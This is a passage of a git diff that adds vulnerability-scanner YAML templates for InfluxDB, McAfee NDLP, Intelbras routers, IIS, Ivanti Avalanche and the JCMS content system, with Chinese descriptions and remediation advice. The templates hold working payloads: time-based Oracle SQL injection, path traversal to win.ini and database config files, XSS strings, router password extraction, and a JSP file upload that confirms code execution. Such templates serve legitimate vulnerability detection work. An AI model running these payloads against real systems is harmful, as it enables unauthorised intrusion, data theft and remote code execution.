3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 + ``` +requests: +- matchers: + - type: word + condition: and + part: body_2 + words: + - last_login + - user_regdate + - uname + - type: status + status: + - 200 + extractors: + - name: token + type: regex + regex: + - REQUEST' value='(.*?)' + - REQUEST" value="(.*?)" + group: 1 + internal: true + matchers-condition: and + raw: + - | + GET /misc.php?action=showpopups&type=friend HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 + - | + GET /include/findusers.php?token={{token}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 + cookie-reuse: true + req-condition: true diff --git "a/config/51pwn/yaml/InfluxData\346\225\260\346\215\256\345\272\223/unauthenticated-influxdb.yaml" "b/config/51pwn/yaml/InfluxData\346\225\260\346\215\256\345\272\223/unauthenticated-influxdb.yaml" new file mode 100755 index 000000000..384fddf07 --- /dev/null +++ "b/config/51pwn/yaml/InfluxData\346\225\260\346\215\256\345\272\223/unauthenticated-influxdb.yaml" @@ -0,0 +1,32 @@ +id: unauthenticated-influxdb +info: + name: Unauthentication InfluxDB Detection + author: + - l0ne1y + description: |- + InfluxData数据库未授权访问 + InfluxDB 是一个时间序列数据库(TSDB), 被设计用来处理高写入、高查询负载,是 TICK 的一部分。 + 当配置不当时,可未授权访问数据库。 + severity: high + remediation: |- + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"results":' + - '"name":"databases"' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/query?db=db&q=SHOW%20DATABASES' + method: GET diff --git "a/config/51pwn/yaml/Intel McAfee Network Data Loss Prevention\357\274\210NDLP\357\274\211/CVE-2017-4011.yaml" "b/config/51pwn/yaml/Intel McAfee Network Data Loss Prevention\357\274\210NDLP\357\274\211/CVE-2017-4011.yaml" new file mode 100755 index 000000000..1305aa14f --- /dev/null +++ "b/config/51pwn/yaml/Intel McAfee Network Data Loss Prevention\357\274\210NDLP\357\274\211/CVE-2017-4011.yaml" @@ -0,0 +1,34 @@ +id: CVE-2017-4011 +info: + name: McAfee NDLP User-Agent XSS + author: + - l0ne1y + description: |- + Intel McAfee Network Data Loss Prevention 跨站脚本漏洞 + Intel McAfee Network Data Loss Prevention(NDLP)是美国英特尔(Intel)公司(原McAfee公司)的一套网络数据丢失防护软件。该软件能够防止无意或恶意泄露客户数据、员工信息和知识产权信息,以及未授权传输信息。 + + Intel McAfee NDLP 9.3.x版本中的服务器存在安全漏洞。远程攻击者可通过更改HTTP请求利用该漏获取会话/cookie信息。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://kc.mcafee.com/corporate/index?page=content&id=SB10198 + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);// + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}' + method: GET + headers: + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);// diff --git a/config/51pwn/yaml/Intelbras IWR 3000N/CVE-2021-3017.yaml b/config/51pwn/yaml/Intelbras IWR 3000N/CVE-2021-3017.yaml new file mode 100755 index 000000000..b0262c7ba --- /dev/null +++ b/config/51pwn/yaml/Intelbras IWR 3000N/CVE-2021-3017.yaml @@ -0,0 +1,60 @@ +id: CVE-2021-3017 +info: + name: Intelbras WIN 300/WRN 342 Credential Disclosure + author: + - pikpikcu + tags: + - cve + - cve2021 + - exposure + - router + description: |- + Intelbras IWR 3000N凭证披露 + Intelbras IWR 3000N是波兰Intelbras公司的一款无线路由器。 + + Intelbras WIN 300 and WRN 342 devices 2021-01-04版本及之前版本存在安全漏洞,该漏洞允许远程攻击者通过读取HTML源代码中的def wireless spassword行来发现凭据。 + reference: + - https://poc.wgpsec.org/peiqi_wiki/%e7%bd%91%e7%bb%9c%e8%ae%be%e5%a4%87%e6%bc%8f%e6%b4%9e/intelbras/intelbras%20wireless%20%e6%9c%aa%e6%8e%88%e6%9d%83%e4%b8%8e%e5%af%86%e7%a0%81%e6%b3%84%e9%9c%b2%20cve-2021-3017.html + - https://nvd.nist.gov/vuln/detail/cve-2021-3017 + - https://www.intelbras.com/pt-br/ajuda-download/faq/roteador-wireless-veloz-wrn-342 + - https://pastebin.com/ctytf0yn + severity: high + classification: + cve-id: + - cve-2021-3017 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.intelbras.com/pt-br/ajuda-download/faq/roteador-wireless-veloz-wrn-342 + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - def_wirelesspassword = + - Roteador Wireless + - type: status + status: + - 200 + extractors: + - type: regex + regex: + - def_wirelesspassword = "([A-Za-z0-9=]+)"; + part: body + matchers-condition: and + path: + - '{{BaseURL}}/index.asp' + method: GET diff --git "a/config/51pwn/yaml/Internet Information Services\357\274\210IIS\357\274\211/CVE-2000-0114.yaml" "b/config/51pwn/yaml/Internet Information Services\357\274\210IIS\357\274\211/CVE-2000-0114.yaml" new file mode 100755 index 000000000..3e18f6ae8 --- /dev/null +++ "b/config/51pwn/yaml/Internet Information Services\357\274\210IIS\357\274\211/CVE-2000-0114.yaml" @@ -0,0 +1,26 @@ +id: CVE-2000-0114 +info: + name: Microsoft FrontPage Extensions Check (shtml.dll) + author: + - l0ne1y + description: "Frontpage Server Extensions名称泄露漏洞 \nFrontpage Server Extensions存在漏洞。远程攻击者借助/_vti_bin/ + 中shtml.dll的RPC POST请求确定匿名账户的名称。 " + severity: low + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + https://www.microsoft.com + + 临时修复方案:
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。
3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。
4、采用成熟的权限管理框架,如spring security。
5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。
6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。
7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - _vti_bin/shtml.dll + matchers-condition: and + path: + - '{{BaseURL}}/_vti_inf.html' + method: GET diff --git "a/config/51pwn/yaml/Internet Information Services\357\274\210IIS\357\274\211/CVE-2017-7269.yaml" "b/config/51pwn/yaml/Internet Information Services\357\274\210IIS\357\274\211/CVE-2017-7269.yaml" new file mode 100755 index 000000000..68ba3c9a2 --- /dev/null +++ "b/config/51pwn/yaml/Internet Information Services\357\274\210IIS\357\274\211/CVE-2017-7269.yaml" @@ -0,0 +1,35 @@ +id: CVE-2017-7269 +info: + name: Windows Server 2003 & IIS 6.0 - Remote Code Execution + author: + - l0ne1y + description: |- + Microsoft Internet Information Services 缓冲区错误漏洞 + Microsoft Windows Server 2003 R2是美国微软(Microsoft)公司发布的一套服务器操作系统。Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 + + Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDAV服务的‘ScStoragePathFromUrl’函数存在缓冲区溢出漏洞。远程攻击者可通过发送特制的PROPFIND请求利用该漏洞执行任意代码。 + severity: critical + remediation: |- + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + + https://technet.microsoft.com/en-us/library/security/4025685.aspx +requests: +- matchers: + - type: word + part: header + words: + - IIS/6.0 + - type: dsl + condition: or + dsl: + - regex("", dasl) + - regex("[\d]+(,\s+[\d]+)?", dav) + - regex(".*?PROPFIND", public) + - regex(".*?PROPFIND", allow) + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}' + method: OPTIONS diff --git a/config/51pwn/yaml/Ivanti Avalanche/CVE-2021-30497.yaml b/config/51pwn/yaml/Ivanti Avalanche/CVE-2021-30497.yaml new file mode 100755 index 000000000..a622dfe35 --- /dev/null +++ b/config/51pwn/yaml/Ivanti Avalanche/CVE-2021-30497.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-30497 +info: + name: Ivanti Avalanche Directory Traversal + author: + - gy741 + description: |- + Ivanti Avalanche 任意文件读取 + Ivanti Avalanche是美国Ivanti公司的一套企业移动设备管理系统。该系统主要用于管理智能手机、平板电脑和条形码扫描仪等设备。 + + Ivanti Avalanche 6.3.2存在安全漏洞,该漏洞源于/AvalancheWeb/image 端点处理的 imageFilePath 参数并未验证是否在图像文件夹范围内。远程未经身份验证的用户通过绝对路径利用该漏洞可以遍历读取任意文件。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US + + 临时修复方案:
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + part: body + words: + - for 16-bit app support + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-DBCONFIG-FILEREAD.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-DBCONFIG-FILEREAD.yaml" new file mode 100755 index 000000000..68fe18f2a --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-DBCONFIG-FILEREAD.yaml" @@ -0,0 +1,31 @@ +id: JCMS-DBCONFIG-FILEREAD +info: + name: JCMS DBCONFIG FILE READ + author: + - l0ne1y + description: |- + 大汉JCMS readxml.jsp 任意文件读取漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在任意文件读取漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"") && contains(body,"") + matchers-condition: and + path: + - '{{BaseURL}}/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig' + method: POST diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Downfile_Jsp-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Downfile_Jsp-SQLi.yaml" new file mode 100755 index 000000000..a1574f9b5 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Downfile_Jsp-SQLi.yaml" @@ -0,0 +1,39 @@ +id: JCMS-Downfile_Jsp-SQLi +info: + name: 大汉JCMS downfile.jsp 注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS downfile.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/jcms/m_5_e/init/download/downfile.jsp?filename=1' + - '{{BaseURL}}/jcms/m_5_e/init/download/downfile.jsp?filename=1%27%20AND%203904%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2880%29%7C%7CCHR%2898%29%7C%7CCHR%2865%29%7C%7CCHR%2881%29%2C5%29%20AND%20%27tMgk%27%3D%27tMgk' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Import_Jsp-FileUpload.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Import_Jsp-FileUpload.yaml" new file mode 100755 index 000000000..5476a5991 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Import_Jsp-FileUpload.yaml" @@ -0,0 +1,64 @@ +id: JCMS-Import_Jsp-FileUpload +info: + name: 大汉JCMS import.jsp上传漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS import.jsp 任意文件上传漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"que_style.jsp") + matchers-condition: and + raw: + - | + POST /jcms/m_5_5/m_5_5_3/import.jsp HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: identity + Content-Length: 177 + Accept-Language: zh-CN,zh;q=0.8 + Accept: */* + User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 + Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 + Connection: keep-alive + Referer: http://www.baidu.com + Cache-Control: max-age=0 + Content-Type: multipart/form-data; boundary=66cd660a74e54d1aa246f04b8c541012 + + --66cd660a74e54d1aa246f04b8c541012 + Content-Disposition: form-data; name="stylefile"; filename="{{randstr}}.jsp" + Content-Type: text/xml + + <% + out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM="))); + new java.io.File(application.getRealPath(request.getServletPath())).delete(); + %> + --66cd660a74e54d1aa246f04b8c541012-- +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"e165421110ba03099a1c0393373c5b43") + path: + - '{{BaseURL}}/jcms/m_5_5/m_5_5_3/temp/upload/{{randstr}}.jsp' + method: GET diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Index_Jsp-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Index_Jsp-SQLi.yaml" new file mode 100755 index 000000000..52d52841f --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Index_Jsp-SQLi.yaml" @@ -0,0 +1,35 @@ +id: JCMS-Index_Jsp-SQLi +info: + name: 大汉JCMS index.jsp注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS index.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && duration>=7 && !contains(body,"%2Fmodule%2Fsitesearch%2Findex.jsp%3Fcolumnid%3D") + matchers-condition: and + path: + - '{{BaseURL}}/module/sitesearch/index.jsp?columnid=0%29%20AND%204351%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2873%29%7C%7CCHR%2898%29%7C%7CCHR%2870%29%2C7%29%20AND%20%281%3D1' + method: GET + req-condition: true diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-JCMSopr_Domsg_JSP-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-JCMSopr_Domsg_JSP-SQLi.yaml" new file mode 100755 index 000000000..2d37e7b2a --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-JCMSopr_Domsg_JSP-SQLi.yaml" @@ -0,0 +1,39 @@ +id: JCMS-JCMSopr_Domsg_JSP-SQLi +info: + name: 大汉JCMS Sopr_domsg.jsp 注入漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS Sopr_domsg.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1' + - '{{BaseURL}}/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1%29%20AND%205639%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2880%29%7C%7CCHR%2888%29%7C%7CCHR%2869%29%7C%7CCHR%28106%29%2C5%29%20AND%20%289259%3D9259' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-M_5_b-XSS.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-M_5_b-XSS.yaml" new file mode 100755 index 000000000..0adc59f17 --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-M_5_b-XSS.yaml" @@ -0,0 +1,32 @@ +id: JCMS-M_5_b-XSS +info: + name: 大汉JCMS系统XSS跨站漏洞 + author: + - l0ne1y + description: |- + 大汉JCMS selmulti_column.jsp 跨站脚本漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在跨站脚本漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在用户浏览器中执行任意脚本代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"") + - '!contains(body,"type=1&userId=2222222")' + path: + - '{{BaseURL}}/jcms/m_5_b/selmulti_column.jsp?type=1&userId=2222222%2b>' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Opr_Datacall_Jsp-SQLi.yaml" "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Opr_Datacall_Jsp-SQLi.yaml" new file mode 100755 index 000000000..384842bee --- /dev/null +++ "b/config/51pwn/yaml/JCMS\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237/JCMS-Opr_Datacall_Jsp-SQLi.yaml" @@ -0,0 +1,36 @@ +id: JCMS-Opr_Datacall_Jsp-SQLi +info: + name: 大汉jcms/lm/front/api/opr_datacall.jsp sql注入 + author: + - l0ne1y + description: |- + 大汉JCMS opr_datacall.jsp SQL注入漏洞 + 大汉JCMS是一款内容管理系统,基于J2EE构架设计。系统提供了从内容采集、创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 + + 大汉JCMS存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.hanweb.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1' + - '{{BaseURL}}/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1%27%20AND%204683=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(104)||CHR(119)||CHR(98),5)%20AND%20%27OxYZ%27=%27OxYZ' + method: GET diff --git 